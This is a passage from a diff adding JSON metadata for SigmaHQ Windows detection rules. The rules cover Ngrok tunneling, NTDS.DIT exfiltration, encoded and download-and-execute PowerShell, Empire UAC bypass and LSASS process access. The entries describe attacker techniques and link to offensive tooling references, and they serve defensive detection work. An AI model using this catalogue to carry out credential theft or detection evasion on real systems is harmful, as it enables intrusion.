"d4498716-1d52-438f-8084-4a603157d131", + "value": "Password Provided In Command Line Of Net.exe" + }, + { + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/14", + "falsepositive": [ + "Rare legitimate installation of kernel drivers via sc.exe" + ], + "filename": "proc_creation_win_susp_new_kernel_driver_via_sc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "value": "New Kernel Driver Via SC.EXE" + }, + { + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_new_service_creation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "value": "Suspicious New Service Creation" + }, + { + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/14", + "falsepositive": [ + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + ], + "filename": "proc_creation_win_susp_ngrok_pua.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ngrok.com/docs", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", + "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", + "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", + "https://twitter.com/xorJosh/status/1598646907802451969", + "https://www.softwaretestinghelp.com/how-to-use-ngrok/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "value": "Ngrok Usage" + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Network administrator computer" + ], + "filename": "proc_creation_win_susp_nmap.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nmap.org/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nmap.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "value": "Suspicious Nmap Execution" + }, + { + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_non_exe_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", + "value": "Execution of Suspicious File Type Extension" + }, + { + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ntdll_type_redirect.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.x86matthew.com/view_post?id=ntdll_pipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "value": "Suspicious Ntdll Pipe Redirection" + }, + { + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ntds.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://github.com/zcgonvh/NTDSDumpEx", + "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "value": "Suspicious Process Patterns NTDS.DIT Exfil" + }, + { + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/14", + "falsepositive": [ + "Legitimate usage to restore snapshots", + "Legitimate admin activity" + ], + "filename": "proc_creation_win_susp_ntdsutil_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", + "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)" + }, + { + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "meta": { + "author": "Elastic (idea), Tobias Michalski", + "creation_date": "2022/05/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ntlmrelay.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/med0x2e/status/1520402518685200384", + "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", + "value": "Suspicious NTLM Authentication on the Printer Spooler Service" + }, + { + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "meta": { + "author": "Nasreddine Bencherchali @nas_bench", + "creation_date": "2021/12/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "value": "Suspicious NT Resource Kit Auditpol Usage" + }, + { + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "meta": { + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate use of odbcconf.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_odbcconf.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", + "https://twitter.com/Hexacorn/status/1187143326673330176", + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.008" + ] + }, + "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe" + }, + { + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate command-lines containing the string mentioned in the command-line" + ], + "filename": "proc_creation_win_susp_office_token_search.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mrd0x.com/stealing-tokens-from-office-applications/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", + "value": "Suspicious Office Token Search Via CLI" + }, + { + "description": "The OpenWith.exe executes other binary", + "meta": { + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "creation_date": "2019/10/12", + "falsepositive": [ + "Legitimate use of OpenWith.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_openwith.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", + "https://twitter.com/harr0ey/status/991670870384021504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", + "value": "OpenWith.exe Executes Specified Binary" + }, + { + "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_outlook.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/sensepost/ruler", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.t1202" + ] + }, + "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", + "value": "Suspicious Execution from Outlook" + }, + { + "description": "Detects a suspicious program execution in Outlook temp folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_outlook_temp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "value": "Execution in Outlook Temp Folder" + }, + { + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_parents.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/x86matthew/status/1505476263464607744?s=12", + "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" + ], + "tags": "No established tags" + }, + "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "value": "Suspicious Process Parents" + }, + { + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_parent_of_conhost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parent_of_conhost.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "value": "Conhost Spawned By Suspicious Parent Process" + }, + { + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/10/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_pchunter.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.xuetr.com/", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" + ], + "tags": "No established tags" + }, + "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "value": "PCHunter Usage" + }, + { + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Use of Program Compatibility Troubleshooter Helper" + ], + "filename": "proc_creation_win_susp_pcwutl.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", + "https://twitter.com/harr0ey/status/989617817849876488", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", + "value": "Code Execution via Pcwutl.dll" + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "filename": "proc_creation_win_susp_pester.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", + "value": "Execute Code with Pester.bat" + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "filename": "proc_creation_win_susp_pester_parent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://twitter.com/_st0pp3r_/status/1560072680887525378", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", + "value": "Execute Code with Pester.bat as Parent" + }, + { + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "meta": { + "author": "Ilya Krestinichev", + "creation_date": "2022/11/03", + "falsepositive": [ + "False positive could occur in admin scripts that execute inline" + ], + "filename": "proc_creation_win_susp_ping_del.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "value": "Suspicious Ping And Del Combination" + }, + { + "description": "Detects a ping command that uses a hex encoded IP address", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + ], + "filename": "proc_creation_win_susp_ping_hex_ip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", + "https://twitter.com/vysecurity/status/977198418354491392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" + ] + }, + "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "value": "Ping Hex IP" + }, + { + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/19", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "filename": "proc_creation_win_susp_plink_port_forward.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", + "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "48a61b29-389f-4032-b317-b30de6b95314", + "value": "Suspicious Plink Port Forwarding" + }, + { + "description": "Execution of plink to perform data exfiltration and tunneling", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/04", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_plink_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "value": "Suspicious Plink Usage RDP Tunneling" + }, + { + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", + "meta": { + "author": "frack113", + "creation_date": "2022/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powercfg.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout" + }, + { + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/24", + "falsepositive": [ + "Other tools that work with encoded scripts in the command line instead of script files" + ], + "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "value": "Suspicious PowerShell Encoded Command Patterns" + }, + { + "description": "Detects suspicious ways to download files or content using PowerShell", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/24", + "falsepositive": [ + "Scripts or tools that download files" + ], + "filename": "proc_creation_win_susp_powershell_download_cradles.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml" + ], + "tags": "No established tags" + }, + "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", + "value": "PowerShell Web Download" + }, + { + "description": "Detects suspicious ways to download files or content and execute them using PowerShell", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/24", + "falsepositive": [ + "Scripts or tools that download files and execute them" + ], + "filename": "proc_creation_win_susp_powershell_download_iex.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", + "value": "PowerShell Web Download and Execution" + }, + { + "description": "Detects suspicious powershell command line parameters used in Empire", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/04/20", + "falsepositive": [ + "Other tools that incidentally use the same command line parameters" + ], + "filename": "proc_creation_win_susp_powershell_empire_launch.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", + "value": "Empire PowerShell Launch Parameters" + }, + { + "description": "Detects some Empire PowerShell UAC bypass methods", + "meta": { + "author": "Ecco", + "creation_date": "2019/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_empire_uac_bypass.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", + "value": "Empire PowerShell UAC Bypass" + }, + { + "description": "Commandline to launch powershell with a base64 payload", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_encode.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", + "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", + "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", + "value": "Suspicious Execution of Powershell with Base64" + }, + { + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_encoded_param.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1281103918693482496", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", + "value": "PowerShell Encoded Character Syntax" + }, + { + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "creation_date": "2018/09/03", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "value": "Suspicious Encoded PowerShell Command Line" + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_getprocess_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + 